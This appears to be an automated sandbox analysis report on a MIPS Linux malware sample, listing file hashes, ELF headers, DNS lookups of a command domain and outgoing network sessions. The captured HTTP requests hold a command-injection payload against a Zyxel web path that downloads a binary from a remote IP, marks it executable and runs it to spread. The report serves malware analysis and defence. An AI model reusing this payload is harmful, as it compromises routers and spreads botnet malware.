                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Preview:/tmp/huhu.mips.elf.
                                                        File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                        Entropy (8bit):5.092424096280615
                                                        TrID:
                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                        File name:huhu.mips.elf
                                                        File size:194'580 bytes
                                                        MD5:0cf8c3c29c266a1249355612d561f785
                                                        SHA1:c5c3d44a7907e638e463806c970bcb87ffa8fb66
                                                        SHA256:2b6f42cdf2086baba1554545343dc1090ceab7d156d967606e64cc15ca549db6
                                                        SHA512:ef278a955ee055bc55eeeebdbc1faa2415e0ff8918cf57b119fcd01221f100806dae378faae64a0c8ebc8819143f2da3af092c5b31f1367eb421a9e131fbf3ff
                                                        SSDEEP:3072:Zc6WEwpCkOSW9JFrMzCjbCs/QtYh2OippWp7D/JXvc9aJp8Z:ZaEwcJheI2bLWND9v4arW
                                                        TLSH:9A14971E6E228F7EF7A8873047B78E25975C23D627E1D684D1ACC1105E6039E641FFA8
                                                        File Content Preview:.ELF.....................@.`...4.........4. ...(.............@...@.....p...p.................F...F....U....X........dt.Q............................<...'.j....!'.......................<...'.j....!... ....'9... ......................<...'.j....!...$....'9e

                                                        ELF header

                                                        Class:ELF32
                                                        Data:2's complement, big endian
                                                        Version:1 (current)
                                                        Machine:MIPS R3000
                                                        Version Number:0x1
                                                        Type:EXEC (Executable file)
                                                        OS/ABI:UNIX - System V
                                                        ABI Version:0
                                                        Entry Point Address:0x400260
                                                        Flags:0x1007
                                                        ELF Header Size:52
                                                        Program Header Offset:52
                                                        Program Header Size:32
                                                        Number of Program Headers:3
                                                        Section Header Offset:194020
                                                        Section Header Size:40
                                                        Number of Section Headers:14
                                                        Header String Table Index:13
                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                        NULL0x00x00x00x00x0000
                                                        .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                        .textPROGBITS0x4001200x1200x265400x00x6AX0016
                                                        .finiPROGBITS0x4266600x266600x5c0x00x6AX004
                                                        .rodataPROGBITS0x4266c00x266c00x30b00x00x2A0016
                                                        .ctorsPROGBITS0x46a0000x2a0000xc0x00x3WA004
                                                        .dtorsPROGBITS0x46a00c0x2a00c0x80x00x3WA004
                                                        .data.rel.roPROGBITS0x46a0180x2a0180xec0x00x3WA004
                                                        .dataPROGBITS0x46a1200x2a1200x4a580x00x3WA0032
                                                        .gotPROGBITS0x46eb800x2eb800xa000x40x10000003WAp0016
                                                        .sbssNOBITS0x46f5800x2f5800x500x00x10000003WAp004
                                                        .bssNOBITS0x46f5d00x2f5800x47880x00x3WA0016
                                                        .mdebug.abi32PROGBITS0x12c60x2f5800x00x00x0001
                                                        .shstrtabSTRTAB0x00x2f5800x640x00x0001
                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                        LOAD0x00x4000000x4000000x297700x297705.47870x5R E0x10000.init .text .fini .rodata
                                                        LOAD0x2a0000x46a0000x46a0000x55800x9d581.25120x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Feb 2, 2024 06:20:18.394148111 CET192.168.2.148.8.8.80x6dcbStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:24.708292961 CET192.168.2.148.8.8.80x7d34Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:32.016519070 CET192.168.2.148.8.8.80x12c0Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:40.325179100 CET192.168.2.148.8.8.80x49b5Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:44.633622885 CET192.168.2.148.8.8.80x2ce6Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:52.939131021 CET192.168.2.148.8.8.80xd175Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:55.269800901 CET192.168.2.148.8.8.80xacf7Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:05.575642109 CET192.168.2.148.8.8.80xad1eStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:10.883867979 CET192.168.2.148.8.8.80x6c05Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:20.190747023 CET192.168.2.148.8.8.80x7170Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:21.521807909 CET192.168.2.148.8.8.80xb527Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:22.849596977 CET192.168.2.148.8.8.80x4c4dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:26.159620047 CET192.168.2.148.8.8.80x3682Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:36.470679998 CET192.168.2.148.8.8.80x2a6aStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:55.581643105 CET192.168.2.148.8.8.80xccafStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:22:10.693007946 CET192.168.2.148.8.8.80xb53dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Feb 2, 2024 06:20:18.496423006 CET8.8.8.8192.168.2.140x6dcbNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:24.810612917 CET8.8.8.8192.168.2.140x7d34No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:32.119090080 CET8.8.8.8192.168.2.140x12c0No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:40.427836895 CET8.8.8.8192.168.2.140x49b5No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:44.735704899 CET8.8.8.8192.168.2.140x2ce6No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:53.041205883 CET8.8.8.8192.168.2.140xd175No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:20:55.371787071 CET8.8.8.8192.168.2.140xacf7No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:05.677824020 CET8.8.8.8192.168.2.140xad1eNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:10.985925913 CET8.8.8.8192.168.2.140x6c05No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:20.293000937 CET8.8.8.8192.168.2.140x7170No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:21.624095917 CET8.8.8.8192.168.2.140xb527No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:22.951754093 CET8.8.8.8192.168.2.140x4c4dNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:26.261719942 CET8.8.8.8192.168.2.140x3682No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:36.572738886 CET8.8.8.8192.168.2.140x2a6aNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:21:55.684091091 CET8.8.8.8192.168.2.140xccafNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Feb 2, 2024 06:22:10.795557022 CET8.8.8.8192.168.2.140xb53dNo error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.145168475.165.41.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.426728010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192.168.2.1444368150.255.148.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.426949024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192.168.2.1448362200.159.48.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.427035093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.143695412.133.197.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.427153111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192.168.2.145060089.139.139.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.427208900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192.168.2.143530041.207.240.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.427268028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192.168.2.144901844.173.94.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.427356958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192.168.2.144298899.189.9.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.427412987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192.168.2.145517066.199.67.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.427484035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192.168.2.145540462.33.15.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.427572012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192.168.2.145238417.51.89.103443
                                                        TimestampBytes transferredDirectionData
